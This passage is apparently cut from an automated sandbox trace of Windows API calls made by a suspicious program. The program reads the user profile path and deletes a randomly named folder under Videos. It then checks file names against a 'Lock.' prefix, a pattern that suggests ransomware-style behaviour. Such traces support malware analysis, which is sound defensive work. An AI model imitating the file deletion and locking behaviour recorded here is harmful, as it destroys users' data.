Size=0xca) returned 0x29f7878 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0212.857] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafc0 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0212.858] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74cc0 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0212.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0212.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e) returned 0x29eb3c8 [0212.859] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/PkICTcvFSPf3s9J", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J", lpFilePart=0x8cf650*="PkICTcvFSPf3s9J") returned 0x26 [0212.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb3c8 | out: hHeap=0x2af0000) returned 1 [0212.859] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J" (normalized: "c:\\users\\fd1hvy\\videos\\pkictcvfspf3s9j")) returned 0x10 [0212.859] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0213.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74cc0 | out: hHeap=0x2af0000) returned 1 [0213.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0213.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0213.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.638] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0213.638] TranslateMessage (lpMsg=0x8cf968) returned 0 [0213.638] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0213.638] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0213.638] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0213.638] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0213.638] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.638] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0213.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0213.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0213.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0213.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0213.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0213.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qt2pH0rRBDAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t2pH0rRBDAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2pH0rRBDAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pH0rRBDAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H0rRBDAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0rRBDAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rRBDAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBDAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BDAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAlo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Alo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lo9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] 